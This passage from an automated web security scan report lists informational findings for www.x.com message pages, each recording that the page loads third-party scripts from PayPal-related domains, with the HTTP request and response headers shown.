<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.177. https://www.x.com/message/212753  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212753

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/212753 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333037353b312c35333437393b312c35333631303b312c35333539323b312c35333631393b312c35333637393b312c35333632383b312c35333636373b312c34353633303b312c35333638373b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=168395 t=1313157514196506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.178. https://www.x.com/message/212906  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212906

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/212906 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333437393b312c35333631303b312c35333631393b312c35333637393b312c35333539323b312c35333632383b312c35333636373b312c34353633303b312c35333638373b312c35333731303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:33 GMT; Path=/
Vary: User-Agent
JP: D=62986 t=1313157513210614
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.179. https://www.x.com/message/213354  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213354

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213354 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333539323b312c35333632383b312c35333631303b312c35333631393b312c35333637393b312c35333636373b312c34353633303b312c35333638373b312c35333731303b312c35333833383b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:32 GMT; Path=/
Vary: User-Agent
JP: D=113506 t=1313157512852345
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.180. https://www.x.com/message/213546  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213546

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213546 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333631303b312c34353633303b312c35333632383b312c35333636373b312c35333631393b312c35333637393b312c35333638373b312c35333731303b312c35333833383b312c35333839393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:32 GMT; Path=/
Vary: User-Agent
JP: D=101383 t=1313157512015652
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.181. https://www.x.com/message/213568  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213568

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213568 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333631393b312c34353633303b312c35333632383b312c35333637393b312c35333636373b312c35333638373b312c35333731303b312c35333833383b312c35333839393b312c35333933353b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=61024 t=1313157511632200
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.182. https://www.x.com/message/213571  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213571

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213571 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333632383b312c34353633303b312c35333638373b312c35333636373b312c35333637393b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=67689 t=1313157511258036
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.183. https://www.x.com/message/213767  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213767

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213767 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333637393b312c35333638373b312c35333636373b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=90276 t=1313157510953739
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.184. https://www.x.com/message/213787  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213787

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213787 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333636373b312c35333638373b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:30 GMT; Path=/
Vary: User-Agent
JP: D=78709 t=1313157510281228
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.185. https://www.x.com/message/213788  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213788

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213788 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333638373b312c35333833383b312c34353633303b312c35333731303b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=103606 t=1313157509903054
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.186. https://www.x.com/message/213865  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213865

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/213865 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=179001 t=1313157509418868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.187. https://www.x.com/message/214347  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214347

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/214347 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333833383b312c35333936313b312c35333933353b312c35333839393b312c35333731303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:28 GMT; Path=/
Vary: User-Agent
JP: D=78567 t=1313157508050072
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.188. https://www.x.com/message/214440  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214440

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/214440 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333731303b312c35333933353b312c35333936313b312c35333833383b312c35333839393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=115134 t=1313157507734977
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.189. https://www.x.com/message/214618  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214618

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/214618 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=71895 t=1313157507417708
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.190. https://www.x.com/message/214902  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214902

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/214902 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=61141 t=1313157507100954
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.191. https://www.x.com/message/214926  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214926

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/214926 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:26 GMT; Path=/
Vary: User-Agent
JP: D=86752 t=1313157506769901
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.192. https://www.x.com/message/215245  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215245

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/215245 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35343036353b312c35333137323b312c35343035383b312c35333135383b312c34373636333b312c35333331323b312c35333235323b312c35333331393b312c35333037353b312c35333334333b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=90525 t=1313157517859526
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
